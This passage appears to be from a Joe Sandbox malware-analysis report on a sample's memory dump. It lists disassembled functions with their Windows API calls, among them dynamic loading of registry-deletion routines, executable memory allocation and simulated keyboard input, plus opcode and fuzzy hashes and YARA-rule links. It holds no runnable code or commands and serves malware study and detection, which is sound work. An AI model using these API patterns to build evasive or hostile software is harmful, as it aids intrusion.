                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                        • API String ID: 2574300362-1587604923
                                                                                                                        • Opcode ID: 6f30e7417574b5f125f0e56bcbaf798082238c52202bd7a770b3dc13f0d84bce
                                                                                                                        • Instruction ID: 647d4fcb61afd61bc5717b4d5059ea992d27a3ca6ac6b5e75a421e66a95c3e40
                                                                                                                        • Opcode Fuzzy Hash: 6f30e7417574b5f125f0e56bcbaf798082238c52202bd7a770b3dc13f0d84bce
                                                                                                                        • Instruction Fuzzy Hash: 96D0A7345063139FEB204F25FC0860237FCEF40309F01546AE865F15A0DB70C4849710
                                                                                                                        Function 00E9137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,00E9135F,?,00E91440), ref: 00E91389
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00E9139B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                        • API String ID: 2574300362-1071820185
                                                                                                                        • Opcode ID: 651ac78390ba572cdd7ea273ed784d37b135773cf33629025591dabd75ae1fe8
                                                                                                                        • Instruction ID: 11da7591672ce349d8c7efc1d88ee9ee725736c5150737356a793a9d921ca4b9
                                                                                                                        • Opcode Fuzzy Hash: 651ac78390ba572cdd7ea273ed784d37b135773cf33629025591dabd75ae1fe8
                                                                                                                        • Instruction Fuzzy Hash: 88D0A734806313AFDB204F25FC0874137ECEF0430CF05445AE495F1590D670C484A710
                                                                                                                        Function 00EB3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00EB3AC2,?,00EB3CF7), ref: 00EB3ADA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EB3AEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                                        • Opcode ID: 9d8d542a5d06689ebf5b1b22256a5e69f49d419c0044cd11cd06e361fe10d85b
                                                                                                                        • Instruction ID: d2e424b3f61bcea1785a6bb6180a2355fa9cd5c63e38e4e1ae30393a499c745a
                                                                                                                        • Opcode Fuzzy Hash: 9d8d542a5d06689ebf5b1b22256a5e69f49d419c0044cd11cd06e361fe10d85b
                                                                                                                        • Instruction Fuzzy Hash: B5D0A7745063138FD7204F31FC0E68377D8EB11308B10541AE5E5F1190EFF0D4809610
                                                                                                                        Function 00E53EC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00E53EBB,?,00E53E91,?), ref: 00E53ED3
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E53EE5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                        • API String ID: 2574300362-1355242751
                                                                                                                        • Opcode ID: 28054d46cc4bf8d78d661acd5111150b9fe8db0d46f1a949e51ef4a36d1a2038
                                                                                                                        • Instruction ID: 490997690f8ef386231eb12466300f80c687dc335bced6eefd3b7746f67d9095
                                                                                                                        • Opcode Fuzzy Hash: 28054d46cc4bf8d78d661acd5111150b9fe8db0d46f1a949e51ef4a36d1a2038
                                                                                                                        • Instruction Fuzzy Hash: 12D0A7344453128FD7609F37FC0D61277D8EB04309B10581BEC55F2194DBB0C484A610
                                                                                                                        Function 00E8A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 34380b255be644e18a989a21c2e27c450324ed78479908f4b84e6976e1d77d35
                                                                                                                        • Instruction ID: be6b6f0008829ef96a40b6b6d9271f695b2bea3b343e44aa8e1ca96430834b02
                                                                                                                        • Opcode Fuzzy Hash: 34380b255be644e18a989a21c2e27c450324ed78479908f4b84e6976e1d77d35
                                                                                                                        • Instruction Fuzzy Hash: 1DC19075A00216EFEB18EF94C984EAEB7B5FF48704F1445AAE809BB251D730DE41CB91
                                                                                                                        Function 00E5AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00EA6AA6), ref: 00E5AB2D
                                                                                                                        • _wcscmp.LIBCMT ref: 00E5AB49
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper_wcscmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 820872866-0
                                                                                                                        • Opcode ID: 4635bd4f1de576e4fbc0a30a5ac7a65999e87ae6bcc82389bc4914fd5b7b139d
                                                                                                                        • Instruction ID: 69952daef7c4c28a879d19dbaa18a82a6bb44f76f24f625535b1658efb934728
                                                                                                                        • Opcode Fuzzy Hash: 4635bd4f1de576e4fbc0a30a5ac7a65999e87ae6bcc82389bc4914fd5b7b139d
                                                                                                                        • Instruction Fuzzy Hash: A6A1057070010ADBDB14DF64E9516ADBBF1FF48301F685A7AEC56A3290EB319874D782
                                                                                                                        Function 00EB0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00EB0D85
                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00EB0DC8
                                                                                                                          • Part of subcall function 00EB0458: CharLowerBuffW.USER32(?,?,?,?), ref: 00EB0478
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EB0FB2
                                                                                                                        • _memmove.LIBCMT ref: 00EB0FC2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3659485706-0
                                                                                                                        • Opcode ID: e236eced7fbc8f2d12f03e8c5ada82ddc969fb22782d46dd32ef980f02a8b6c9
                                                                                                                        • Instruction ID: fefd9e261041eebb6f5901659a52e051325a570d2a782432aab5e5a914f48e30
                                                                                                                        • Opcode Fuzzy Hash: e236eced7fbc8f2d12f03e8c5ada82ddc969fb22782d46dd32ef980f02a8b6c9
                                                                                                                        • Instruction Fuzzy Hash: D0B18E716043008FC714DF28C4909ABBBE4EF89754F14996EF899AB351DB31ED45CB92
                                                                                                                        Function 00EAAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00EAAF56
                                                                                                                        • CoUninitialize.OLE32 ref: 00EAAF61
                                                                                                                          • Part of subcall function 00E91050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00E910B8
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00EAAF6C
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00EAB23F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 780911581-0
                                                                                                                        • Opcode ID: 5ea93a32c5750a53b5b3a2a04a904ededf3573c26d44fad431de65d53d33f275
                                                                                                                        • Instruction ID: 40b475267884f2aefe64f993faaf4b8f9d8d490f37e4eeefe17080a208ddb2cb
                                                                                                                        • Opcode Fuzzy Hash: 5ea93a32c5750a53b5b3a2a04a904ededf3573c26d44fad431de65d53d33f275
                                                                                                                        • Instruction Fuzzy Hash: 01A135356047019FCB10DF14C991B6AB7E5BF89364F149859F99AAB3A2CB30FD44CB82
                                                                                                                        Function 00E742EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3877424927-0
                                                                                                                        • Opcode ID: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                        • Instruction ID: 0f0294d29ec63a8852f8821114715caf59ccb38f974866b6a72fd1ea5864367e
                                                                                                                        • Opcode Fuzzy Hash: e32231b6dc630e7bc50233d96a8fcff1e19409cefeea7d324ce0ed3258b5a775
                                                                                                                        • Instruction Fuzzy Hash: C151C6B1A00305EBDB249FB988846AE77B5AF40324F24D729F87DB62D0E7709E519B40
                                                                                                                        Function 00EBC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00EBC354
                                                                                                                        • ScreenToClient.USER32(?,00000002), ref: 00EBC384
                                                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00EBC3EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3880355969-0
                                                                                                                        • Opcode ID: 2eafb8851e1bab77af403ee77a55e526d7f25637a6e99c0107b01abf8467c5ae
                                                                                                                        • Instruction ID: e455d587d5a54486d2c4bbaae2338fd7b492f7d49fffef8824481b81d4729b1c
                                                                                                                        • Opcode Fuzzy Hash: 2eafb8851e1bab77af403ee77a55e526d7f25637a6e99c0107b01abf8467c5ae
                                                                                                                        • Instruction Fuzzy Hash: 66515C71A04209AFCF10DF68C880AEE7BE6FF45364F209559E965AB291D770ED41CB90
                                                                                                                        Function 00E8D206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E8D258
                                                                                                                        • __itow.LIBCMT ref: 00E8D292
                                                                                                                          • Part of subcall function 00E8D4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E8D549
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E8D2FB
                                                                                                                        • __itow.LIBCMT ref: 00E8D350
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$__itow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3379773720-0
                                                                                                                        • Opcode ID: 994c3886865d95d077215a5131774acd1c006ebb0d4553e39919c08330c0aef8
                                                                                                                        • Instruction ID: 99ac66eb36d3a2414c14683f633e3baa7d66ff8d98d65df3543bc914f4ef3fbd
                                                                                                                        • Opcode Fuzzy Hash: 994c3886865d95d077215a5131774acd1c006ebb0d4553e39919c08330c0aef8
                                                                                                                        • Instruction Fuzzy Hash: B4418171A04609ABDF11EF54CC52BEE7BF9AF88701F005419FA09B32D1DB709A49CB62
                                                                                                                        Function 00E9EE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E9EF32
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00E9EF58
                                                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E9EF7D
                                                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E9EFA9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3321077145-0
                                                                                                                        • Opcode ID: 3053c4a29fe3575ce86b8764b69143c419f27e04b3df941182e52eada51d6985
                                                                                                                        • Instruction ID: 6abf49eb3f9e3bd0b9b28ccd79b0baa01a2262bf2fa1ebbdd486776e55b25b3d
                                                                                                                        • Opcode Fuzzy Hash: 3053c4a29fe3575ce86b8764b69143c419f27e04b3df941182e52eada51d6985
                                                                                                                        • Instruction Fuzzy Hash: 834102396006119FCF10EF15CA45A59BBE6EF89320B199489ED5ABF362CB30FD44CB91
                                                                                                                        Function 00EBB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EBB3E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InvalidateRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 634782764-0
                                                                                                                        • Opcode ID: 224b94d6ed71a79323448e9331f8eefd15cccbac86fe76c2d4d6ff0799fa5510
                                                                                                                        • Instruction ID: 4c97af2d77141e5c6439f9f804c7d32d2ebf9a0049f2ebc4a14fdd9ea6141ab9
                                                                                                                        • Opcode Fuzzy Hash: 224b94d6ed71a79323448e9331f8eefd15cccbac86fe76c2d4d6ff0799fa5510
                                                                                                                        • Instruction Fuzzy Hash: 0B31D034600208EFEF249E59DC85FEE37A4FB05354F54A512FA62F61A2E7F0D840AB61
                                                                                                                        Function 00EBD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00EBD617
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00EBD68D
                                                                                                                        • PtInRect.USER32(?,?,00EBEB2C), ref: 00EBD69D
                                                                                                                        • MessageBeep.USER32(00000000), ref: 00EBD70E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1352109105-0
                                                                                                                        • Opcode ID: 9e60a3d7cceb837dee880f3cc2a5a034d213843dc2f49f7393ae9505e91a2c2d
                                                                                                                        • Instruction ID: b7b38deec93c04af1e193ee03df65c3bb235d467f5dfb75f0fcc2f1ef28e83e6
                                                                                                                        • Opcode Fuzzy Hash: 9e60a3d7cceb837dee880f3cc2a5a034d213843dc2f49f7393ae9505e91a2c2d
                                                                                                                        • Instruction Fuzzy Hash: 2441C934A08119DFCB11CF99EC80BEA7BF5FB49314F1891AAE509AB254E730E841DB80
                                                                                                                        Function 00E94497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00E944EE
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E9450A
                                                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00E9456A
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00E945C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: b662bd46fa376e131995b73fd11c6e06b994080748442c356fe1515c60626471
                                                                                                                        • Instruction ID: 4c5c709b7447c979354ddf860e99ff6d94ff29d391d87143e11021c93c67fae0
                                                                                                                        • Opcode Fuzzy Hash: b662bd46fa376e131995b73fd11c6e06b994080748442c356fe1515c60626471
                                                                                                                        • Instruction Fuzzy Hash: 5731E9F19042589FEF348BA49C08FFE7BA59B49318F05515AF482721C1C7749A46D761
                                                                                                                        Function 00E84DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E84DE8
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00E84E16
